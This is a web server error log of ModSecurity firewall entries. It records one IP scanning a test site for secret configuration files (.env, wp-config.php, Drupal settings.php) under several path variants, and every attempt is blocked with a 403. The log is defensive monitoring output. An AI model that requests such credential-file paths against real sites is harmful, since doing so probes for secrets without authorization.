[Fri Jan 16 03:18:37.506305 2026] [:error] [pid 1444033] [client 45.148.10.246:54654] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWmf_dLJkp65ULFQ2YYiPwAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./.env
[Fri Jan 16 03:18:37.679006 2026] [:error] [pid 1444040] [client 45.148.10.246:54660] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWmf_fn_5sIyKhJ5GAzZogAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/config/.env
[Fri Jan 16 03:18:37.679232 2026] [:error] [pid 1444040] [client 45.148.10.246:54660] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWmf_fn_5sIyKhJ5GAzZogAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/config/.env
[Fri Jan 16 03:18:37.679392 2026] [:error] [pid 1444040] [client 45.148.10.246:54660] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWmf_fn_5sIyKhJ5GAzZogAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/config/.env
[Fri Jan 16 03:18:37.801533 2026] [:error] [pid 1444032] [client 45.148.10.246:54672] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env/"] [unique_id "aWmf_ekMvq8uPO2ZciWp1AAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/config/.env/
[Fri Jan 16 03:18:37.801799 2026] [:error] [pid 1444032] [client 45.148.10.246:54672] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env/"] [unique_id "aWmf_ekMvq8uPO2ZciWp1AAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/config/.env/
[Fri Jan 16 03:18:37.801976 2026] [:error] [pid 1444032] [client 45.148.10.246:54672] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env/"] [unique_id "aWmf_ekMvq8uPO2ZciWp1AAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/config/.env/
[Fri Jan 16 03:18:37.957800 2026] [:error] [pid 1444226] [client 45.148.10.246:54676] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWmf_WcpoCUgeFICb0be2gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//config/.env
[Fri Jan 16 03:18:37.958058 2026] [:error] [pid 1444226] [client 45.148.10.246:54676] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWmf_WcpoCUgeFICb0be2gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//config/.env
[Fri Jan 16 03:18:37.958239 2026] [:error] [pid 1444226] [client 45.148.10.246:54676] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWmf_WcpoCUgeFICb0be2gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//config/.env
[Fri Jan 16 03:18:38.108799 2026] [:error] [pid 1444034] [client 45.148.10.246:54684] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWmf_uRfEYyDES-ZFL4h0wAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./config/.env
[Fri Jan 16 03:18:38.109056 2026] [:error] [pid 1444034] [client 45.148.10.246:54684] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWmf_uRfEYyDES-ZFL4h0wAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./config/.env
[Fri Jan 16 03:18:38.109257 2026] [:error] [pid 1444034] [client 45.148.10.246:54684] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWmf_uRfEYyDES-ZFL4h0wAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./config/.env
[Fri Jan 16 03:18:45.423967 2026] [:error] [pid 1444035] [client 45.148.10.246:44596] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aWmgBbauW6yeGWXfDeFXQgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/wp-config.php
[Fri Jan 16 03:18:45.424199 2026] [:error] [pid 1444035] [client 45.148.10.246:44596] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aWmgBbauW6yeGWXfDeFXQgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/wp-config.php
[Fri Jan 16 03:18:45.424369 2026] [:error] [pid 1444035] [client 45.148.10.246:44596] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aWmgBbauW6yeGWXfDeFXQgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/wp-config.php
[Fri Jan 16 03:18:45.541064 2026] [:error] [pid 1444033] [client 45.148.10.246:44600] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php/"] [unique_id "aWmgBdLJkp65ULFQ2YYiRgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/wp-config.php/
[Fri Jan 16 03:18:45.541420 2026] [:error] [pid 1444033] [client 45.148.10.246:44600] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php/"] [unique_id "aWmgBdLJkp65ULFQ2YYiRgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/wp-config.php/
[Fri Jan 16 03:18:45.541594 2026] [:error] [pid 1444033] [client 45.148.10.246:44600] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php/"] [unique_id "aWmgBdLJkp65ULFQ2YYiRgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/wp-config.php/
[Fri Jan 16 03:18:45.705369 2026] [:error] [pid 1444031] [client 45.148.10.246:44608] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aWmgBX-9MmrgwjmYTAJTSAAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//wp-config.php
[Fri Jan 16 03:18:45.705608 2026] [:error] [pid 1444031] [client 45.148.10.246:44608] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aWmgBX-9MmrgwjmYTAJTSAAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//wp-config.php
[Fri Jan 16 03:18:45.705782 2026] [:error] [pid 1444031] [client 45.148.10.246:44608] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aWmgBX-9MmrgwjmYTAJTSAAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//wp-config.php
[Fri Jan 16 03:18:45.892833 2026] [:error] [pid 1444040] [client 45.148.10.246:44614] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aWmgBfn_5sIyKhJ5GAzZqgAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./wp-config.php
[Fri Jan 16 03:18:45.893064 2026] [:error] [pid 1444040] [client 45.148.10.246:44614] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aWmgBfn_5sIyKhJ5GAzZqgAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./wp-config.php
[Fri Jan 16 03:18:45.893239 2026] [:error] [pid 1444040] [client 45.148.10.246:44614] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aWmgBfn_5sIyKhJ5GAzZqgAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./wp-config.php
[Fri Jan 16 03:19:54.417713 2026] [:error] [pid 1444034] [client 45.148.10.246:35876] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aWmgSuRfEYyDES-ZFL4ibAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/sites/default/settings.php
[Fri Jan 16 03:19:54.417978 2026] [:error] [pid 1444034] [client 45.148.10.246:35876] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aWmgSuRfEYyDES-ZFL4ibAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/sites/default/settings.php
[Fri Jan 16 03:19:54.418175 2026] [:error] [pid 1444034] [client 45.148.10.246:35876] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aWmgSuRfEYyDES-ZFL4ibAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/sites/default/settings.php
[Fri Jan 16 03:19:54.562575 2026] [:error] [pid 1444035] [client 45.148.10.246:35888] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.php/"] [unique_id "aWmgSrauW6yeGWXfDeFXgAAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/sites/default/settings.php/
[Fri Jan 16 03:19:54.562858 2026] [:error] [pid 1444035] [client 45.148.10.246:35888] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.php/"] [unique_id "aWmgSrauW6yeGWXfDeFXgAAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/sites/default/settings.php/
[Fri Jan 16 03:19:54.563023 2026] [:error] [pid 1444035] [client 45.148.10.246:35888] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.php/"] [unique_id "aWmgSrauW6yeGWXfDeFXgAAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/sites/default/settings.php/
[Fri Jan 16 03:19:54.748781 2026] [:error] [pid 1444033] [client 45.148.10.246:35894] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aWmgStLJkp65ULFQ2YYihAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//sites/default/settings.php
[Fri Jan 16 03:19:54.749011 2026] [:error] [pid 1444033] [client 45.148.10.246:35894] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aWmgStLJkp65ULFQ2YYihAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//sites/default/settings.php
[Fri Jan 16 03:19:54.749168 2026] [:error] [pid 1444033] [client 45.148.10.246:35894] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aWmgStLJkp65ULFQ2YYihAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//sites/default/settings.php
[Fri Jan 16 03:19:54.946691 2026] [:error] [pid 1444032] [client 45.148.10.246:35906] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aWmgSukMvq8uPO2ZciWrAAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./sites/default/settings.php
[Fri Jan 16 03:19:54.946939 2026] [:error] [pid 1444032] [client 45.148.10.246:35906] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aWmgSukMvq8uPO2ZciWrAAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./sites/default/settings.php
[Fri Jan 16 03:19:54.947100 2026] [:error] [pid 1444032] [client 45.148.10.246:35906] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aWmgSukMvq8uPO2ZciWrAAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./sites/default/settings.php
